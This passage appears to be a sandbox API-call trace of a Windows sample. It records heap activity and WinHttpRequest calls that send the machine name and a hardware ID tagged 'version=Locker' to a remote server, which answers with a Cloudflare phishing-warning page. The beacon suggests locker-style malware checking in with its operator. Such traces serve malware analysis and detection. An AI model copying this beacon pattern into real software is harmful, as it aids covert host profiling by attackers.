varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x2, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f478*=0x2b5995) returned 0x0 [0243.411] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0243.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc958 [0243.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc970 [0243.411] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c25c8 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc42358 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2578 | out: hHeap=0x8a0000) returned 1 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc958 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa3d3b8 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2f88 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc9b8 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e868 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2568 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: hHeap=0x8a0000) returned 1 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0243.412] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c25c8 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bca18 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2568 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e868 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bc970 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc940 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bcaa8 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e890 [0243.412] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bc8e0 [0243.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc940 | out: hHeap=0x8a0000) returned 1 [0243.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0243.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e868 | out: hHeap=0x8a0000) returned 1 [0243.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0243.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2f88 [0243.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0243.413] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bc970 [0243.413] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x8e7738, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f380*="Send", cNames=0x1, lcid=0x800, rgDispId=0x87f484 | out: rgDispId=0x87f484*=5) returned 0x0 [0243.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc970 | out: hHeap=0x8a0000) returned 1 [0243.413] WinHttpRequest:IDispatch:GetTypeInfo (in: This=0x8e7738, iTInfo=0x0, lcid=0x800, ppTInfo=0x87f378 | out: ppTInfo=0x87f378*=0x9d414c) returned 0x0 [0243.413] ITypeInfo:RemoteGetTypeAttr (in: This=0x9d414c, ppTypeAttr=0x87f370, pDummy=0x356310 | out: ppTypeAttr=0x87f370, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalGetIDsOfNames (This=0x9d414c) returned 0x0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x0, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x1, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x2, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xa44f48 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x3, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x4, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x5, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x6, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x7, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x8, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.413] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.413] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0x9, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.414] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.414] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0xa, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.414] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.414] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0xb, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.414] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.414] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0xc, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.414] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.414] ITypeInfo:RemoteGetFuncDesc (in: This=0x9d414c, index=0xd, ppFuncDesc=0x87f374, pDummy=0x356310 | out: ppFuncDesc=0x87f374, pDummy=0x356310*=0x3225e4) returned 0x0 [0243.414] ITypeInfo:LocalReleaseTypeAttr (This=0x9d414c) returned 0xbfd380 [0243.414] ITypeInfo:LocalReleaseFuncDesc (This=0x9d414c) returned 0xc04ea0 [0243.414] WinHttpRequest:IUnknown:Release (This=0x9d414c) returned 0x1 [0243.414] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0xc33b38 [0243.414] WinHttpRequest:IDispatch:Invoke (in: This=0x8e7738, dispIdMember=5, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x1, pDispParams=0x87f468*(rgvarg=([0]=0xc33b3c*(varType=0x8, wReserved1=0x72, wReserved2=0x63, wReserved3=0x69, varVal1="pcname=XDUWTFONO&hwid=XNGnHuBtZMP7Oc4UntiQCY9VF&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430, puArgErr=0x87f478 | out: pDispParams=0x87f468*(rgvarg=([0]=0xc33b3c*(varType=0x8, wReserved1=0x72, wReserved2=0x63, wReserved3=0x69, varVal1="pcname=XDUWTFONO&hwid=XNGnHuBtZMP7Oc4UntiQCY9VF&version=Locker", varVal2=0x0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x0, pExcepInfo=0x87f430*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f478*=0x2b5995) returned 0x0 [0243.636] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0243.636] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7e60 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7f50 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1950 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e5928 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0e20 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1830 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc33b38 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2f88 | out: hHeap=0x8a0000) returned 1 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7e60 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bca18 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2568 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bc8e0 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e890 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c25c8 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7f50 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0243.637] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0243.637] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1950 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0243.637] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0243.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0243.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e890 [0243.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0243.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0243.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0xbd1170 [0243.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a) returned 0xa2e728 [0243.638] WinHttpRequest:IDispatch:GetIDsOfNames (in: This=0x8e7738, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x87f380*="ResponseText", cNames=0x1, lcid=0x800, rgDispId=0x87f484 | out: rgDispId=0x87f484*=9) returned 0x0 [0243.638] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e728 | out: hHeap=0x8a0000) returned 1 [0243.638] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0xc6b5b0 [0243.638] WinHttpRequest:IDispatch:Invoke (in: This=0x8e7738, dispIdMember=9, riid=0x322c2c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x800, wFlags=0x3, pDispParams=0x87f468*(rgvarg=0xc6b5b4, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x87f450, pExcepInfo=0x87f430, puArgErr=0x87f478 | out: pDispParams=0x87f468*(rgvarg=0xc6b5b4, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x87f450*(varType=0x8, wReserved1=0x7738, wReserved2=0xc, wReserved3=0x0, varVal1="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", varVal2=0x9b9130), pExcepInfo=0x87f430*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x87f478*=0x2b5995) returned 0x0 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd1170 | out: hHeap=0x8a0000) returned 1 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7e60 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1fb0) returned 0xc784d0 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1820 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc6b5b0 | out: hHeap=0x8a0000) returned 1 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7e60 | out: hHeap=0x8a0000) returned 1 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2e890 | out: hHeap=0x8a0000) returned 1 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1950 | out: hHeap=0x8a0000) returned 1 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2e890 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7e60 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1950 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7e60 | out: hHeap=0x8a0000) returned 1 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed18 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7e60 [0244.145] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7f68 [0244.145] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0244.145] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 1 [0244.146] TranslateMessage (lpMsg=0x87fa74) returned 0 [0244.146] DispatchMessageW (lpMsg=0x87fa74) returned 0x0 [0244.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e92d0 [0244.146] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.146] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87f110) returned 1 [0244.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e92d0 | out: hHeap=0x8a0000) returned 1 [0244.146] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.146] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0244.146] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0244.147] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0xa2ed40 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bcaa8 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18e0 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c68 [0244.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9c7c50 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18e0 [0244.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4050 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfd2) returned 0xc74568 [0244.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", cchWideChar=4050, lpMultiByteStr=0xc74568, cbMultiByte=4050, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n\n\n\n \n\nSuspected phishing site | Cloudflare\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
\n
Please enable cookies.
\n
\n
\n

Warning: Suspected Phishing Site Ahead!

\n

This link has been flagged as phishing. We suggest you avoid it.

\n
\n\n
\n\n
\n
\n
\n

What is phishing?

\n\n

This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a trustworthy source.

\n

\n

\n \n \n \n
\n

\n
\n\n
\n

What can I do?

\n\n

If you're a visitor of this website
\n The website owner has been notified and is in the process of resolving the issue. For now, it is recommended that you do not continue to the link that has been flagged.

\n\n

If you're the owner of this website
\n Please log in to cloudflare.com to review your flagged website. If you have questions about why this was flagged as phishing please contact the Trust & Safety team for more information.

\n
\n
\n
\n\n \n\n\n
\n
\n\n \n\n\n\n", lpUsedDefaultChar=0x0) returned 4050 [0244.147] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c50 | out: hHeap=0x8a0000) returned 1 [0244.147] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xfe0) returned 0xc7a488 [0244.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc74568 | out: hHeap=0x8a0000) returned 1 [0244.148] GetLastError () returned 0x0 [0244.148] SetLastError (dwErrCode=0x0) [0244.148] GetLastError () returned 0x0 [0244.148] SetLastError (dwErrCode=0x0) [0244.148] WriteFile (in: hFile=0xfffffffe, lpBuffer=0x8e4188, nNumberOfBytesToWrite=0xfd1, lpNumberOfBytesWritten=0x87dd88, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x87dd88, lpOverlapped=0x0) returned 0 [0244.148] GetLastError () returned 0x6 [0244.148] GetLastError () returned 0x6 [0244.148] SetLastError (dwErrCode=0x6) [0244.148] GetLastError () returned 0x6 [0244.148] SetLastError (dwErrCode=0x6) [0244.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xc7a488 | out: hHeap=0x8a0000) returned 1 [0244.148] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18e0 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c7c68 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bcaa8 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa2ed40 | out: hHeap=0x8a0000) returned 1 [0244.149] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0e20 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1830 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba510 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba318 | out: hHeap=0x8a0000) returned 1 [0244.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba300 | out: hHeap=0x8a0000) returned 1 